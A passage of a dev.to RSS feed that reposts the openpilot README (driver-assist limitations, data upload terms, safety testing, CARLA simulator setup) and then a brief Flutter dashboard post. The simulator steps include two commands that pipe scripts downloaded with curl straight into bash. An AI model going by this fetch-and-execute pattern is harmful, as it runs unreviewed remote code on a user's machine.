openpilot ALC and openpilot LDW do not automatically drive the vehicle or reduce the amount of attention that must be paid to operate your vehicle. The driver must always keep control of the steering wheel and be ready to correct the openpilot ALC action at all times.&lt;/p&gt;

&lt;p&gt;While changing lanes, openpilot is not capable of looking next to you or checking your blind spot. Only nudge the wheel to initiate a lane change after you have confirmed it's safe to do so.&lt;/p&gt;

&lt;p&gt;Many factors can impact the performance of openpilot ALC and openpilot LDW, causing them to be unable to function as intended. These include, but are not limited to:&lt;/p&gt;

&lt;p&gt;Poor visibility (heavy rain, snow, fog, etc.) or weather conditions that may interfere with sensor operation.&lt;br&gt;
The road facing camera is obstructed, covered or damaged by mud, ice, snow, etc.&lt;br&gt;
Obstruction caused by applying excessive paint or adhesive products (such as wraps, stickers, rubber coating, etc.) onto the vehicle.&lt;br&gt;
The device is mounted incorrectly.&lt;br&gt;
When in sharp curves, like on-off ramps, intersections etc...; openpilot is designed to be limited in the amount of steering torque it can produce.&lt;br&gt;
In the presence of restricted lanes or construction zones.&lt;br&gt;
When driving on highly banked roads or in presence of strong cross-wind.&lt;br&gt;
Extremely hot or cold temperatures.&lt;br&gt;
Bright light (due to oncoming headlights, direct sunlight, etc.).&lt;br&gt;
Driving on hills, narrow, or winding roads.&lt;br&gt;
The list above does not represent an exhaustive list of situations that may interfere with proper operation of openpilot components. It is the driver's responsibility to be in control of the vehicle at all times.&lt;/p&gt;

&lt;p&gt;Limitations of openpilot ACC and FCW&lt;br&gt;
openpilot ACC and openpilot FCW are not systems that allow careless or inattentive driving. It is still necessary for the driver to pay close attention to the vehicle’s surroundings and to be ready to re-take control of the gas and the brake at all times.&lt;/p&gt;

&lt;p&gt;Many factors can impact the performance of openpilot ACC and openpilot FCW, causing them to be unable to function as intended. These include, but are not limited to:&lt;/p&gt;

&lt;p&gt;Poor visibility (heavy rain, snow, fog, etc.) or weather conditions that may interfere with sensor operation.&lt;br&gt;
The road facing camera or radar are obstructed, covered, or damaged by mud, ice, snow, etc.&lt;br&gt;
Obstruction caused by applying excessive paint or adhesive products (such as wraps, stickers, rubber coating, etc.) onto the vehicle.&lt;br&gt;
The device is mounted incorrectly.&lt;br&gt;
Approaching a toll booth, a bridge or a large metal plate.&lt;br&gt;
When driving on roads with pedestrians, cyclists, etc...&lt;br&gt;
In presence of traffic signs or stop lights, which are not detected by openpilot at this time.&lt;br&gt;
When the posted speed limit is below the user selected set speed. openpilot does not detect speed limits at this time.&lt;br&gt;
In presence of vehicles in the same lane that are not moving.&lt;br&gt;
When abrupt braking maneuvers are required. openpilot is designed to be limited in the amount of deceleration and acceleration that it can produce.&lt;br&gt;
When surrounding vehicles perform close cut-ins from neighbor lanes.&lt;br&gt;
Driving on hills, narrow, or winding roads.&lt;br&gt;
Extremely hot or cold temperatures.&lt;br&gt;
Bright light (due to oncoming headlights, direct sunlight, etc.).&lt;br&gt;
Interference from other equipment that generates radar waves.&lt;br&gt;
The list above does not represent an exhaustive list of situations that may interfere with proper operation of openpilot components. It is the driver's responsibility to be in control of the vehicle at all times.&lt;/p&gt;

&lt;p&gt;Limitations of openpilot DM&lt;br&gt;
openpilot DM should not be considered an exact measurement of the alertness of the driver.&lt;/p&gt;

&lt;p&gt;Many factors can impact the performance of openpilot DM, causing it to be unable to function as intended. These include, but are not limited to:&lt;/p&gt;

&lt;p&gt;Low light conditions, such as driving at night or in dark tunnels.&lt;br&gt;
Bright light (due to oncoming headlights, direct sunlight, etc.).&lt;br&gt;
The driver's face is partially or completely outside field of view of the driver facing camera.&lt;br&gt;
The driver facing camera is obstructed, covered, or damaged.&lt;br&gt;
The list above does not represent an exhaustive list of situations that may interfere with proper operation of openpilot components. A driver should not rely on openpilot DM to assess their level of attention.&lt;/p&gt;

&lt;p&gt;User Data and comma Account&lt;br&gt;
By default, openpilot uploads the driving data to our servers. You can also access your data by pairing with the comma connect app (iOS, Android). We use your data to train better models and improve openpilot for everyone.&lt;/p&gt;

&lt;p&gt;openpilot is open source software: the user is free to disable data collection if they wish to do so.&lt;/p&gt;

&lt;p&gt;openpilot logs the road facing camera, CAN, GPS, IMU, magnetometer, thermal sensors, crashes, and operating system logs. The driver facing camera is only logged if you explicitly opt-in in settings. The microphone is not recorded.&lt;/p&gt;

&lt;p&gt;By using openpilot, you agree to our Privacy Policy. You understand that use of this software or its related services will generate certain types of user data, which may be logged and stored at the sole discretion of comma. By accepting this agreement, you grant an irrevocable, perpetual, worldwide right to comma for the use of this data.&lt;/p&gt;

&lt;p&gt;Safety and Testing&lt;br&gt;
openpilot observes ISO26262 guidelines, see SAFETY.md for more details.&lt;br&gt;
openpilot has software in the loop tests that run on every commit.&lt;br&gt;
The safety model code lives in panda and is written in C, see code rigor for more details.&lt;br&gt;
panda has software in the loop safety tests.&lt;br&gt;
Internally, we have a hardware in the loop Jenkins test suite that builds and unit tests the various processes.&lt;br&gt;
panda has additional hardware in the loop tests.&lt;br&gt;
We run the latest openpilot in a testing closet containing 10 EONs continuously replaying routes.&lt;br&gt;
Testing on PC&lt;br&gt;
For simplified development and experimentation, openpilot can be run in the CARLA driving simulator, which allows you to develop openpilot without a car. The whole setup should only take a few minutes.&lt;/p&gt;

&lt;p&gt;Steps:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Start the CARLA server on first terminal&lt;br&gt;
bash -c "$(curl &lt;a href="https://raw.githubusercontent.com/commaai/openpilot/master/tools/sim/start_carla.sh)"&gt;https://raw.githubusercontent.com/commaai/openpilot/master/tools/sim/start_carla.sh)&lt;/a&gt;"&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Start openpilot on second terminal&lt;br&gt;
bash -c "$(curl &lt;a href="https://raw.githubusercontent.com/commaai/openpilot/master/tools/sim/start_openpilot_docker.sh)"&gt;https://raw.githubusercontent.com/commaai/openpilot/master/tools/sim/start_openpilot_docker.sh)&lt;/a&gt;"&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Press 1 to engage openpilot&lt;br&gt;
You should also take a look at the tools directory in master: lots of tools you can use to replay driving data, test, and develop openpilot from your PC.&lt;/p&gt;

&lt;p&gt;Community and Contributing&lt;br&gt;
openpilot is developed by comma and by users like you. We welcome both pull requests and issues on GitHub. Bug fixes and new car ports are encouraged.&lt;/p&gt;

&lt;p&gt;You can add support for your car by following guides we have written for Brand and Model ports. Generally, a car with adaptive cruise control and lane keep assist is a good candidate. Join our Discord to discuss car ports: most car makes have a dedicated channel.&lt;/p&gt;

&lt;p&gt;Directory Structure&lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--qfuoqMRu--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/9jcm2kaukz6mer6bxw95.PNG" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--qfuoqMRu--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/9jcm2kaukz6mer6bxw95.PNG" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Licensing&lt;br&gt;
openpilot is released under the MIT license. Some parts of the software are released under other licenses as specified.&lt;/p&gt;

&lt;p&gt;Any user of this software shall indemnify and hold harmless comma.ai, Inc. and its directors, officers, employees, agents, stockholders, affiliates, subcontractors and customers from and against all allegations, claims, actions, suits, demands, damages, liabilities, obligations, losses, settlements, judgments, costs and expenses (including without limitation attorneys’ fees and costs) which arise out of, relate to or result from any use of this software by user.&lt;/p&gt;

&lt;p&gt;THIS IS ALPHA QUALITY SOFTWARE FOR RESEARCH PURPOSES ONLY. THIS IS NOT A PRODUCT. YOU ARE RESPONSIBLE FOR COMPLYING WITH LOCAL LAWS AND REGULATIONS. NO WARRANTY EXPRESSED OR IMPLIED.&lt;/p&gt;

</description>
      <category>csharp</category>
      <category>python</category>
      <category>perl</category>
      <category>html</category>
    </item>
    <item>
      <title>Responsive Admin Panel or Dashboard - Flutter UI</title>
      <dc:creator>Kaixin</dc:creator>
      <pubDate>Sat, 08 May 2021 19:55:04 +0000</pubDate>
      <link>https://dev.to/penucuricode/responsive-admin-panel-or-dashboard-flutter-ui-2pl9</link>
      <guid>https://dev.to/penucuricode/responsive-admin-panel-or-dashboard-flutter-ui-2pl9</guid>
      <description>&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--d_P6TyMS--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/gex020fid1g8d80aiqq3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--d_P6TyMS--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/gex020fid1g8d80aiqq3.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;br&gt;
Live Preview : &lt;a href="https://abuanwar072.github.io/Flutter-Responsive-Admin-Panel-or-Dashboard/#/"&gt;https://abuanwar072.github.io/Flutter-Responsive-Admin-Panel-or-Dashboard/#/&lt;/a&gt;&lt;br&gt;
Packages we are using:&lt;/p&gt;

&lt;p&gt;flutter_svg: &lt;a href="https://pub.dev/packages/flutter_svg"&gt;https://pub.dev/packages/flutter_svg&lt;/a&gt;&lt;br&gt;
google_fonts: &lt;a href="https://pub.dev/packages/google_fonts"&gt;https://pub.dev/packages/google_fonts&lt;/a&gt;&lt;br&gt;
provider: &lt;a href="https://pub.dev/packages/provider"&gt;https://pub.dev/packages/provider&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Fonts&lt;br&gt;
Poppins: &lt;a href="https://fonts.google.com/specimen/Poppins"&gt;https://fonts.google.com/specimen/Poppins&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;On Flutter V2.* web officially supported on a stable branch. Today I share an Admin panel or you can call it dashboard UI build with flutter. Now you can build your app dashboard using flutter. This dashboard contains almost everything that you need like a chart, table, nice small card for showing info. It works perfectly on the Web, macOS app, Tablet also on both Android and iOS phones. It's time to code once run everywhere. Yeah, Flutter web is not SEO friendly but we don't need SEO for the admin panel.&lt;/p&gt;

</description>
      <category>html</category>
      <category>ruby</category>
      <category>dart</category>
      <category>swift</category>
    </item>
  </channel>
</rss>
